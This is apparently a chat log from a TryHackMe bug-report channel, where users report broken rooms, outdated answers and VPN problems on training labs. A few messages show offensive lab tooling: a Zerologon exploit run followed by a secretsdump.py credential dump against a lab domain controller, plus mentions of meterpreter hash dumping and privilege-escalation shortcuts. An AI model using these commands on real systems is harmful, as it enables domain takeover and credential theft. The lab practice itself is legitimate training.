Not at all - it catches me out and others quite often too 🙂

Im asking cuz idk, 😭

Sometimes, on virtual machines, directly on Tryhackme, I get this error: the requested connection does not exist. Please check the name and try again. Do you know where this error comes from, and how to fix it?

Yup, I faced the same issue with one room, related to Windows
After trying so much, I gave up and used my own machine

I am facing an issue while accessing the learning paths, it keeps loading forever then I get a 404 error and/or 504 erros

has anyone had issues with viewing the learning path

i just get stuck on https://tryhackme.com/paths and nothing appears

Yes, site/CDN issues presently.

Windows Fundamentals 1 box WINFUN1.1 appears to not be working. Launching the machines yields “The requested connection does not exist.”

Hi, everybody. I have a question. I am going to the WREATH room network, but I cannot scan the port with nmap. It tells me that the target ip machine is down. What is the situation?

Are you on the Wreath VPN?

yes

Very minor type that causes a command to be incorrect:
In the Snort room https://tryhackme.com/room/snort task: Operation Mode 1: Sniff Mode
If you find the first command in the exercise you will see it's sudo snort -v-i eth0 When I think it should be sudo snort -vi eth0
Hopefully this is seen as worth reporting on, sorry if this is too minor and seen as a waste of time. Thank you.

Linux Fundamentals Part 1 - Task 7

I entered this wrong answer on accident and it got accepted??

possible answer tolerance

Huh, didn't know that was a thing here. My answer wouldn't give the expected the result, so I don't think this should be allowed...

I don't know if it's question by question.

But I know for answers it does apply to, you'll get a larger tolerance for a larger answer,

WINFUN1.1 operational again

The Persist Active Directory network module has a small bug, the persistad.ovpn config file present on the AttackBox has an error on line 14, data-ciphers needs to be replaced with cipher

I was wondering why my interface wasn't showing up, that is the root cause of the problem, changing this allowed me to connect.

Which OpenVPN version does it use

ooh smog is a rare user that actually not got openvpn 2.6.0 or later

My AttackBox is currently running OpenVPN 2.4.4

Your AttackBox or the TryHackMe attackbox?

My aplogies, the TryHackMe web-based AttackBox

@dusky junco Can you update the OpenVPN version on the AttackBox, please?

huh so that slipped through the cracks

it's fine now, but I saw a bunch of people voting for a reset, I guess they couldn't find the interface and they thought that there was something wrong with the network module instead

exploitingad.ovpn

persistingad.ovpn

Those are screenshots directly from the /root/Desktop/NetworkConfigs directory on the THM web-based AttackBox

Ah pants this is going to be quite a problem, right?

Yes, VPN server update is going to stop users from using the networks

I've got quite a list of changes pending on the AttackBox but I still need to work through them but I'll look into getting an update out just for this

Ah balls

uhm, okay, alright, yeah. I'll work on it and try and get OpenVPN updated into prod ASAP

No problem, please don't stress!

I’m sorry for putting work on you guys on a Friday

no no, it's not your fault at all 🙂

the link given in the exifdata leads to an older version of cyberchef(?) and gives the wrong output. using the latest version of cyberchef gives the correct key https://tryhackme.com/room/pylonzf

there's supposed to be a website up on port 80 for this room but after waiting 10+ mins and restarting the box 3 times i couldn't get it running https://tryhackme.com/room/islandorchestration

not sure about the version or issue, but this is what i got using the url vs using locally downloaded v10.4 of cyberchef:

Thanks a lot for updating the OpenVPN on the THM AttackBox guys 👍

Also, if it's not too much to ask, is there any plans to update msf on the AttackBox, I've been having sessions drop randomly, usually I run msfupdate on the AttackBox and most of the times it tends to fix the issue, just throwing this out there, it's not time critical or anything just an idea

AFAIK no.

Due the number of older rooms there is in THM.

A high number of older rooms require msf5

Ahhh, forgot about that, no issue at all, thank you 👍

Gave +1 Rep to @quaint sparrow

hey 👋 msf was updated to 6.3.5 a few weeks ago on the attackbox. I haven't heard of sessions dropping out, but happy to look into it. Could you give an example of a room where this has happened so I can try and replicate it please? 🙂

Oh! sorry Ben, I didn't know ( I don't use it) and seen about this in the past. (AoC 2022 IIRC)

Hey! No problem! It was a silent upgrade, so we're just looking out for the repercussions of it

Hi 🙂 I'm trying to solve Investigating Windows 3.x and it seems like sysmon's log file is missing 😦

I turned off the machine and turn it on again, the windows wallpaper ain't even loading 😦

Yeah, no problem, it’s not one specific machine or anything like that. I usually just use meterpreter sessions to dump hashes and download files mostly, it’s just that sometimes when I’m running commands the session would randomly drop on me, it’s not time sensitive or any type of emergency so don’t worry about it too much Ben

Sysmon room Task 10 VM is not booting up

something wrong?

"The requested connection does not exist"

https://tryhackme.com/room/winadbasics

hi guys,
having a big trouble with this room.
The code to reset sophie's password, as suggested by the task, doesnt work and return's an error message: can you please help me out with this?

It's a user error, not a bug.

You have a space between the hyphen and verbose.

- verbose should be -verbose

thank you very much!!!!!

Gave +1 Rep to @quaint sparrow

@strong ether

The room is missing the virtual machine.

https://tryhackme.com/room/gettingstarted

@green steppe

In version 1.9 of this room the parameter -q (quiet) was changed to -g (greppable).

https://tryhackme.com/room/rustscan

Thanks.

Gave +1 Rep to @green steppe

404 - page not found when clicking link related to target hack (Settlement agreement).

soc level 1 learning pathway > cyber kill chain > practice analysis > "settlement agreement" link.

Good day. Thank you for letting me know. I just recently updated this room to fix some stuff, and for some reason, the VM disappeared. This is now fixed!

Gave +1 Rep to @copper tide

Hello ! i have got a problem with 'vulnversity room. It says i still have one question to answer but when i go in it i already answered all. Thank you for your help 🙂

After talking to you and I went to check mine and realized I have the same issue.

same issue here

Hello all. Hope you are fine

In the room Sysinternals Task 3. It is asked to turn on network discovery. What I did. But after clicking on "save changes", network discovery keeps being on "Turn off network discovery" option. So I can't run \live.sysinternals.com\

Done!

Is there a div tag with a "hidden" property or something?
That'd at least be easy to rememedy 😄

in Room "Intro to malware analysis" at task 6: there is no more entry on March 14th for that hash in Hybrid Analysis like the task tells us. Task is not solvable.

Picked up on it, will be resolved soon I guess 🙂

The green start machine button is not showing up in the task anywhere! I am in the room: https://tryhackme.com/room/operatingsystemsecurity#

indeed. the button is missing
@glad badger might help

Hello,

I believe I found an error in the last option of this room:

https://tryhackme.com/room/javascriptbasics

I've forward this to our team. Thank you for reporting. 🙏

Gave +1 Rep to @waxen cosmos

Remove the spaces? What's the answer format provided like?

operating system security task 3 also does not give the target ip address.When will this bug be resolved ?

it's known to THM. will be fixed

Hey everyone. I'm doing the Operating System Security's room and in the last question I have a bug I can't see the green button "Start the attached machine by clicking on the green “Start Machine” button at the top right of this task".

is known bug. thm staff is fixing it soon

No one is facing this issue ?

not faced it yet as have not done that room yet

Me too

https://tryhackme.com/room/vulnversity

for me this room is completed and in the learning path says that is not completed and don't give me any certificate

#1092490706385383524 🙂

ohh thank you, I just open discord now to report this situation. next time I search before in the rooms

Gave +1 Rep to @raw bison

Sure not an issue, still appreciated reporting it 🙂

thanks for your time 🥺

Should be fixed, thanks for reporting 🙂

Gave +1 Rep to @fallow tide

hey yo. i've been trying to redo this room https://tryhackme.com/room/vulnversity but have been encountering problems with directory discovery.

Room URL: https://tryhackme.com/room/intromalwareanalysis
Summary: Provided credentials not accepted by VM
Additional Notes: On Task 4, credentials ubuntu:123456 are provided for accessing the machine. Machine however does not seem to accept the provided password.

it kept prompting this error. i've tried resetting the machine but same error. tried using dirbuster and it also prompted connection refused XD

Hi, In Vulnversity via CompTIA Pentest+ it's show that i didn't finish the room while i finished everything, is that a bug?

#1092490706385383524

does it mean we need wait to a fix?

yeee, sadly

Room URL: https://tryhackme.com/room/burpsuitebasics#
Summary: Incorrect answer for Task 7
Additional Notes: Task 7 (Options) answer to "In which User options sub-tab can you change the Burp Suite update behaviour?" does not accept the correct answer based off Burp Suite Community Edition version 2023.3.5

yeah think the room is a bit outdated

yea, just spotted that the hotkeys question is outdated too

Hey guys, I am having issues with the upload vulnerability room. I try to search the given url: overwrite.uploadvuln.thm like it says, but it wont bring my to any site

Hey guys, not a Bug but potential security issue. I was working on the room "c4ptur3-th3-fl4g" yesterday. In Task 2 there is a hint recommending audacity as a tool. There is a fake website (wich was the first google result for me) thats known to spread malware. Domain-grabbing should be considered as a threat imo. Maybe someone of the staff should have a look here.

Hi on room: Post-Exploitation Basics
i'm trying to connect via rdp with the pass P@$$W0rd. in ssh it's ok, on rdp it's not working

Password incorrect via rdp

I already complete the begginer path but the vulnversity room seems bugged... and i cant declare my certification..What can i do for this problem?

#1092490706385383524

Hi, it seems like the bug is due to the Vulnversity room, that, even if completed at 100%, result at 99% in the path.
In fact 3 paths that i've already copmpleted at 100% is now at 99% and Vulnversity seems incomplete even if it is at 100%.

Edit: i saw now that the bug is already attributed at Vulnversity

#1092490706385383524

is there a known issue for the SQL Injection room? I'm on task 6: Blind SQLi - Authentication Bypass. I got the flag but its telling me it's not correct.

nvm, I realize it was the flag for the previous task lol. I had to click on next level to get the new flag.

Is anyone else having issues with the Mr.Robot room badge?

I think this is the best place to post this (if a diff channel is better please let me know)

In the room Ra, you need to installed spark 2.8.3, but it relies on openjdk-8-jre and oracle-java8-jre, but the kali 2023 image does not have access to this older version

So, should an update to the room state that it must be completed using the attack box? I've tried to find an older version and as or right now, I can't seem to find an archived version. The opens I am finding are like update 300 and such which I think is to new for this install

What's the bug?

I've always taken that as

it's [age < 17] If the age is older then they're able to drive, so the code runs.

However, that might not be the approach the room creator was aiming for.

I think they're right?

Yeah, looking at it.

> More than
< Less than

Can you send the room URL @blissful reef

https://tryhackme.com/room/pythonbasics

yeah needs to be less than 17 not above

Reported

No the room is right 😆

If age is less than 17, you cannot drive

Elif age is more than 17, you can

Thanks to Munra

introtodocker room (NEW) icon is small/bugged

lmao that's funny

@dusky junco

Hahahaha

My thm profile is bugged to high heavens as it is so I'm not surprised

It looks adorable ngl

The room is wrong no?

How?

Wait it is

Should be "below 17"

Yep, that's wrong

How the heck did that go unnoticed

it happens 😄

sure but that room is pretty old

@hazy tiger i was talking about the sentence in the ( )

tbh when I solved that room I didn't read much as I was already good at python, I was just moving down and solving, I bet some people noticed but never reported

(age is above 17)

It’s important you explain bugs when you post them^

yup i was busy sorry

See it say if the Condition age < 17 is true ( age Above 17) the Code inside the if statement is gonna run

which is the opposite thing

Basically it says if age < 17 in other word ( age ABOVE 17 ) the Code inside the if statement is gonna run

and it suppose to be ( AGE Less than 17 )

got it yet?

we got it...yes

I am Decent with python too but since the Sentence was Highlighted with ( ) so..

Thanks Jay ❤️

Gave +1 Rep to @placid abyss

Vulnversity is bug? I just answered all the questions but I can't complete the room (95%), I've repeated the room twice

it's a bug, yes, they're working on it #1092490706385383524

Yo, I think the Burp: Repeater room is broken

how so?

So in Task Nr. 7 the goal is to trigger a 500 status code

But it doesn't give me a flag. I tried everything and after reading in a walk through I realized that not even the input that was used in the walk through worked for me

Its always:
500
No entries found with that ID

And in the walk through it says
500
FLAG

What payloads are you trying? Could you share a screenshot of what you are trying… maybe I can help 🤷‍♂️

I can give u the payloads I tried. I don't have discord on my laptop so I don't prefer screenshots

Payloads I used:
0
-1
6
999
9999999999999999
'
!

You could just use discord through your browser…

Oh, didn't think bout that. Okay, if U wish I'll create some screens

Okay, for some reason the site doesn't load anymore. I'll be back, when it works again -.-

Just found a (relatively) unintended privesc in the WWBuddy room, you can bypass the lateral privesc to jenny and go straight to root

@timber bone I can send you a guide on how I did it if you'd like

Sometimes things like that are fixed on relaunch of the target machine. @wheat fractal

Hello, in the left pane you can find Windows PowerShell under OpenSSH

Question, I have a buddy I do these rooms with, and he noticed that most rooms can be completely bypassed and gain root via the pkexec, is this normal/intentional? Or should the older rooms be patched so this can't happen (since it's technically cheating)

Hey everyone. I'm doing the Operating System Security's room and in the last question I have a bug when i enter the ssh command and put the password the output is Permission denied, please try again. I really don't understand I read everything and did step by step but ...

Hi guys i was doing vulnversity room on try hack me with myobile phone using termux and I had to completed half of it but after I connect the openvpn and tried to visit the webserver which was running on port 3333 I was getting an error I had even cross check that I connected to the VPN and everything was working fine but that error was still showing please help me

There are several older rooms that are subject to new exploits.
Its encouraged to still trying to do them in the way the guide intends to learn the experience.
Especially since in the field, you're likely to find high profile CVEs like that are more miss than hit.

What was the error?
Did you take a screenshot?
You can always confirm your VPN status with curl http://10.10.10.10

You can send it if you want 🙂

The error was:
'Unable to connect' after waiting couple of minutes, and when first time I can ping and also getting response but after sometime I won't getting the responses as well

hello i got an issue everytime i start the machine and the ip was given i cant do anything with that ip i cant ping or do nothing , so i cant do any hack cause the ip not working

you need to either connect to the vpn using openvpn or use the attackbox to access the ip

ye iam connected with openvpn

i tryed both

but still i cant do nothing

can you do curl 10.10.10.10/whoami ??? because if that returns an ip the vpn is working as intended if not there is a troubleshooting process to go through

ty

Hello all, in the room (Soc lvl1 path) Threat Intelligence Tools on Task 7 I cannot use the data on the attached VM. Cannot download them as well

Have 2 issues with the website:

1. Cant complete "vulnversity"
   When i click on it i am stuck in constant "Loading..."

2. Cant complete lab in "zer0logon" i run the commands for task 4 and get this output:

(impacketEnv) root@ip-10-10-34-167:~# python3 zero.py DC01 10.10.197.170
Performing authentication attempts...

Success! DC can be fully compromised by a Zerologon attack.

(impacketEnv) root@ip-10-10-34-167:~# ~/impacketEnv/bin/secretsdump.py -just-dc -no-pass DC01$@10.10.197.170
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
(impacketEnv) root@ip-10-10-34-167:~#

For issue #1 see #1092490706385383524

thats not the issue...

The room isn't loading != room not showing as done

I need enough sleep :\ my bad

for issue #1 could you try to clear browser cache/try another browser?
I just opened it and it's working for me

Done!

Hello All,

I am in Windowsprives20 room ,task6 (https://tryhackme.com/room/windowsprivesc20), it talks about absuing SeBackup Privilege

C:> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

as per the output the SeBackupPrivilege is DISABLED , is it supposed to be enabled to be able to exploit this ??

if yes then the screenshot attached to this task should be changed

So, windows privileges are weird.
Even if they're disabled, you still actually have them, you just need to enable it

If you truly don't have that privilege, it won't be displayed

https://tryhackme.com/room/ret2libc Task 1 room links are private, specifically

https://tryhackme.com/room/ccghidra
https://tryhackme.com/room/introtox8664

This a community room. @silver turret is this your room?

yep, should I remove them?

or what does it mean if they are private?

In this case, it means the room has most likely been retired/it is out of date. I'd remove them or replace them with URLs to content that you think is relevant on the search page i.e. https://tryhackme.com/hacktivities?tab=search&page=1&free=all&order=most-popular&difficulty=all&type=all&searchTxt=reverse

Okay, got it, thanks

Gave +1 Rep to @dusky junco

Both rooms have been retired. 🙂

for the throwback network - I am having an issue on timekeep.throwback.local where after resetting the user's password, I login and just get a blank page. My pivoting configuration is working because I have compromised DC, and can access the initial login page of timekeep but cant login for further enumeration. if there are logs or commands I am using that I can provide I will. I have reset the lab all ready and can confirm that I have by having to reset my SSH fingerprint.

It's updated. Should be okay now

yup! Thanks!

Gave +1 Rep to @silver turret

i have a problem with the new room capture
i tried all possible usernames and all of them returned this user doesn't exist

#1104105935615565854

Room bugs
Room URL: https://tryhackme.com/room/vulnversity
Summary: [Outdated room content]
Additional Notes: Same the end this room, stay with status not completed. Don't end the room, same 100%

#1092490706385383524

This is a known issue to the team.

👋
Anywhere/way to report:

• typos in hint-patterns
• outdated/incorrect room answers

Here.

https://tryhackme.com/room/windowsforensics1, Task 9: Q2 Answer pattern ******** **** ******** *.* *** ****** should be ******** ************ *.* *** ****** (extra space, not in the screenshot w/ the answer)

(Another submission once I've confirmed the info 👍 )

That'd be a site bug, those are auto generated

If so, it's probably also expecting a space in the answer, which is (also) incorrect

Enter the answer and refresh the page, see what the "true" answer it's expecting is

After checking, the answer pattern is correctly aligned with the expected answer. 🙂

I just submitted the answer in the format I expect (without the space) and it was accepted...?

Answer tolerance, if it’s 95% right, it will be accepted

Very interesting feature!

So sounds like the expected answer could use an update (@glad badger confirmed the pattern matches the expected answer) - Where to send/post screenshots?

The expected answer is the correct answer. No update is needed. 🙂

The correct answer doesn't have that extra space (5 words, not 6)

Room: Subdomain Enumeration
Task 6 - Virtual Hosts

The first subdomain found is "api"
The next one found is accepted as answer for first question.

Can't say if false positive because all three subdomains found don't resolve properly (added entry to /etc/hosts. acmeitsupport.thm resolves just fine, none of the subdomains do)

IIRC, this isn't a bug, if you use the attackbox the correct name will show up first.

it's not a bug but i dind't find the right place to report this so

it's just a little orthography error

windows internals task9 wrong flag

task 7 sorry

Which flag is wrong?

No, the flag isn't wrong.

There is a high probably chance you're entering the wrong character. (this one isn't a great one to copy from)

Now I see what you mean. Will have to look at it later today. 🙏

@misty gull I tried submitting without the space and it did work, but after refresh the actual correct answer will be replaced in the box and that answer has a space which means the author has put it with a space if I am not wrong

Sounds consistent with:
#room-bugs message and #room-bugs message

Indeed 👌 just wanted to clarify my thoughts on this :D

because I had similar concerns, see #site-bugs message

I am not sure if this is a bug or just me misunderstanding it. The task picture does not match the actual permissions of the file.

Room is:
Windows Fundamentals 1

i think this should be modified..

for this question the script name needs to have ".nse" short for Nmap Script Engine

wait hold on

nvm it worked lol

Room = Burp Suite: The basics
Task 7 - answer MISC is not up to date with current attack box version of burp. I had to look up the answer as MISC settings is no longer at play

Morning. Would this be the right place to get help on a problem with one of the VMs in a room im having issues with?

What's the problem?

To get more accurate help.

Please state the room ( & task, if relevant)

Jr Penetration Tester > File Inclusion

Error response

Error code: 405

Message: Method Not Allowed.

Error code explanation: 405 - Specified method is invalid for this resource.

This isn't a bug.

Thats the error message whenever i try to load the website for any of the labs

You're trying to load up the website of the attackbox.

i am

You need to load up the IP in this link, when you press the green Start machine button.

When you press the green button, the ip will populate from the ip shown in the red box.

oh...my...god....

i cant believe i missed that

No worries!

This is the case for the majority of room tasks.

Some will open a seperate split screen machine.

yup i got it to load the page now

damn it, sorry about that. Clearly i need more coffee LOL
thank you!

Is this supposed to be port 21 or why does it say 20?

FTP is used on 20 and 21.

Port 20 is used to send the files between the server and the client.

ty so much

Gave +1 Rep to @quaint sparrow

So Port 21 for Control Channel and port 20 for Data Channel right?

Remember that it won't always use 21/20, same with other services - its just the "standard"

Hi! I'm starting the Linux Fundamentals course and started up the Ubuntu VM. I tried whoami and what was returned is root, but that answer was showing up as incorrect. I had to google it and found the correct answer, please see screenshot. Maybe I did something wrong when booting up the VM?

Linux Fundamentals which part?

linuxfundamentalspart1

You started the AttackBox instead of the target machine. 🙂

you need to start the machine in task 3

ah that makes sense! Thanks for the help. I thought I might have done something wonky 😅

it's alright, always look for the machines in the tasks, the majority of the time you will need to interact with them from the AttackBox or your VM, but sometimes they start as a separate machine in your browser

Has anyone else had an issue with "Ra" where the spark messenger .deb image could not be downloaded on kali?

What error do you get?

When trying to install with sudo dpkg -i spark_2_8_3.deb: ```
dpkg: regarding spark_2_8_3.deb containing spark-messenger, pre-dependency problem:
spark-messenger pre-depends on openjdk-8-jre | oracle-java8-jre
openjdk-8-jre is not installed.
oracle-java8-jre is not installed.

dpkg: error processing archive spark_2_8_3.deb (--install):
pre-dependency problem - not installing spark-messenger
Errors were encountered while processing:
spark_2_8_3.deb```

Have you tried doing what the error says?

Have you pressed the start machine button?

Can you send a screenshot?

That's the ssh you've to access.

You see that, right?

Then you haven't started the machine.

Press the green button.

No, you started the attackbox.

That's a separate machine.

Yes, i am unable to install the dependencies since these packages cannot be found on kali. I was able to install spark on the attackbox, however there was another issue that lead to it crashing constantly.

Hello, I think the empire room needs to be reviewed and updated, I have spent a considerable amount of time trying to install, first off the current release of empire does not have an appimage, i went with an older one but the ./empire —rest command does not work, it just says permission denied I tried changing it to an executable, it is a dir. I’m stuck

OWASP Top 10 - 2021
Webservices aren't reliable. I'm able to establish a tcp connection but the websever do not anwser. Terminate and restarting machines don't fix it

Room: Daily bugle

Apparently there's some backend version mismatches which invalidate majority of the exploits.
Details:
https://github.com/rapid7/metasploit-framework/issues/14149#issuecomment-1161947582

On a side note the one python script that was supposed to work is of an unknown python version, and I'm getting a weird str-bytes concatenation error with python3.11. Looking to fix that...

Solved the python issue.
In the relevant python script: ||change line 46 to value.decode()||
At least users and hashes are getting dumped. Can't get session to work properly yet.

hello, has anyone had any issues with Vulnversity? I've completed the room previously and now its showing that I still have progress to complete. However looking at the room questions everything is completed.

heres what my dash board shows